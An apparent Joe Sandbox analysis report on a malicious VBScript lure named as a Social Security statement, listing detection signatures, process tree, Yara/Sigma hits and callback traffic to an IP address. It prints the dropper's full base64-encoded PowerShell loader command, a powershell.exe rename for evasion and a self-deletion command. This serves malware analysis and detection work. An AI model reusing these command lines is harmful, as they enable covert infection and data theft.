Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Social_Security_Statement_Review.vbs

Overview

General Information

Sample name:Social_Security_Statement_Review.vbs
Analysis ID:1511959
MD5:a7e0d6762e771f76218b38b4f4a5a521
SHA1:0e148d6e964db3a3f1c3f9239f132d313372298e
SHA256:413f94db284db86c6030ae2b1f57f875a754c6b1d45c0ed98846b5d9f740521d
Tags:vbs
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Renames powershell.exe to bypass HIPS
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 764 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6416 cmdline: cmd /c copy "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Social_Security_Statement_Review.vbs.exe (PID: 1648 cmdline: "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" -enc JABWAGkAaAB3AHgAaQBrAHQAZwBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAEgAZwB3AHIAYgBjAGkAegBoAGsAIAA9ACAAZwBlAHQALQBjAG8AbgB0AGUAbgB0ACAAJABWAGkAaAB3AHgAaQBrAHQAZwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAZwB3AHIAYgBjAGkAegBoAGsALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEMAbwB4AG0AYgB4AG4AZgB0AGgAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAKQA7ACQATwB2AGoAbQBhACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABIAHgAYgB6AGgAbQB5AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBvAHAAeQBUAG8AKAAgACQATwB2AGoAbQBhACAAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBsAG8AcwBlACgAKQA7ACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgACQATwB2AGoAbQBhAC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAEwAdABnAHQAegB6AHEAYwB1AHYAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAFUAaABmAGwAdgAgAD0AIAAkAEwAdABnAHQAegB6AHEAYwB1AHYALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABVAGgAZgBsAHYALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFUAaABmAGwAdgAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA= MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • InstallUtil.exe (PID: 6536 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" MD5: 909A1D386235DD5F6BA61B91BA34119D)
      • InstallUtil.exe (PID: 5660 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" MD5: 909A1D386235DD5F6BA61B91BA34119D)
      • InstallUtil.exe (PID: 5440 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" MD5: 909A1D386235DD5F6BA61B91BA34119D)
      • InstallUtil.exe (PID: 6328 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" MD5: 909A1D386235DD5F6BA61B91BA34119D)
      • InstallUtil.exe (PID: 3200 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" MD5: 909A1D386235DD5F6BA61B91BA34119D)
      • InstallUtil.exe (PID: 3156 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" MD5: 909A1D386235DD5F6BA61B91BA34119D)
      • InstallUtil.exe (PID: 5472 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" MD5: 909A1D386235DD5F6BA61B91BA34119D)
      • InstallUtil.exe (PID: 5236 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" MD5: 909A1D386235DD5F6BA61B91BA34119D)
      • powershell.exe (PID: 6268 cmdline: "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\user\Desktop\Social_Security_Statement_Review.vbs' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2145984908.0000024F6F580000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000004.00000002.2060632755.0000024F57431000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: Social_Security_Statement_Review.vbs.exe PID: 1648JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Process Memory Space: Social_Security_Statement_Review.vbs.exe PID: 1648INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x59bb15:$b2: ::FromBase64String(
          • 0x12974:$s1: -join
          • 0x16474:$s1: -join
          • 0x14e4f8:$s1: -join
          • 0x15b5cd:$s1: -join
          • 0x15e99f:$s1: -join
          • 0x15f051:$s1: -join
          • 0x160b42:$s1: -join
          • 0x162d48:$s1: -join
          • 0x16356f:$s1: -join
          • 0x163ddf:$s1: -join
          • 0x16451a:$s1: -join
          • 0x16454c:$s1: -join
          • 0x164594:$s1: -join
          • 0x1645b3:$s1: -join
          • 0x164e03:$s1: -join
          • 0x164f7f:$s1: -join
          • 0x164ff7:$s1: -join
          • 0x16508a:$s1: -join
          • 0x1652f0:$s1: -join
          • 0x167486:$s1: -join

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.Social_Security_Statement_Review.vbs.exe.24f6f580000.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            4.2.Social_Security_Statement_Review.vbs.exe.24f679770c0.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" -enc JABWAGkAaAB3AHgAaQBrAHQAZwBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAEgAZwB3AHIAYgBjAGkAegBoAGsAIAA9ACAAZwBlAHQALQBjAG8AbgB0AGUAbgB0ACAAJABWAGkAaAB3AHgAaQBrAHQAZwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAZwB3AHIAYgBjAGkAegBoAGsALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEMAbwB4AG0AYgB4AG4AZgB0AGgAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAKQA7ACQATwB2AGoAbQBhACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABIAHgAYgB6AGgAbQB5AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBvAHAAeQBUAG8AKAAgACQATwB2AGoAbQBhACAAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBsAG8AcwBlACgAKQA7ACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgACQATwB2AGoAbQBhAC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAEwAdABnAHQAegB6AHEAYwB1AHYAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAFUAaABmAGwAdgAgAD0AIAAkAEwAdABnAHQAegB6AHEAYwB1AHYALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABVAGgAZgBsAHYALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFUAaABmAGwAdgAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=, CommandLine: "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" -enc JABWAGkAaAB3AHgAaQBrAHQAZwBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAEgAZwB3AHIAYgBjAGkAegBoAGsAIAA9ACAAZwBlAHQALQBjAG8AbgB0AGUAbgB0ACAAJABWAGkAaAB3AHgAaQBrAHQAZwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAZwB3AHIAYgBjAGkAegBoAGsALgBSAGUAcABsAGEAYwBlACgAJw
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs", ProcessId: 764, ProcessName: wscript.exe
              Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe, ProcessId: 1648, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kd5t4pbk.njz.ps1
              Sigma detected: Suspicious Copy From or To System Directory
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd /c copy "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" /Y, CommandLine: cmd /c copy "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" /Y, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 764, ParentProcessName: wscript.exe, ProcessCommandLine: cmd /c copy "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" /Y, ProcessId: 6416, ProcessName: cmd.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs", ProcessId: 764, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\user\Desktop\Social_Security_Statement_Review.vbs' -Force, CommandLine: "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\user\Desktop\Social_Security_Statement_Review.vbs' -Force, CommandLine|base64offset|contains: Jy, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" -enc JABWAGkAaAB3AHgAaQBrAHQAZwBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAEgAZwB3AHIAYgBjAGkAegBoAGsAIAA9ACAAZwBlAHQALQBjAG8AbgB0AGUAbgB0ACAAJABWAGkAaAB3AHgAaQBrAHQAZwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAZwB3AHIAYgBjAGkAegBoAGsALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEMAbwB4AG0AYgB4AG4AZgB0AGgAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAKQA7ACQATwB2AGoAbQBhACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABIAHgAYgB6AGgAbQB5AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBvAHAAeQBUAG8AKAAgACQATwB2AGoAbQBhACAAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBsAG8AcwBlACgAKQA7ACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgACQATwB2AGoAbQBhAC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAEwAdABnAHQAegB6AHEAYwB1AHYAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAFUAaABmAGwAdgAgAD0AIAAkAEwAdABnAHQAegB6AHEAYwB1AHYALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABVAGgAZgBsAHYALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFUAaABmAGwAdgAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=, ParentImage: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe, ParentProcessId: 1648, ParentProcessName: Social_Security_Statement_Review.vbs.exe, Process

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F581EA000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157787430.0000024F6FC40000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F581EA000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157787430.0000024F6FC40000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: powershell.pdbUGP source: Social_Security_Statement_Review.vbs.exe, 00000004.00000000.1462493070.00007FF6C0E3A000.00000002.00000001.01000000.00000005.sdmp, Social_Security_Statement_Review.vbs.exe.2.dr
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: powershell.pdb source: Social_Security_Statement_Review.vbs.exe, 00000004.00000000.1462493070.00007FF6C0E3A000.00000002.00000001.01000000.00000005.sdmp, Social_Security_Statement_Review.vbs.exe.2.dr
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: global trafficTCP traffic: 192.168.2.9:49709 -> 176.150.119.15:56001
              Source: Joe Sandbox ViewIP Address: 176.150.119.15 176.150.119.15
              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
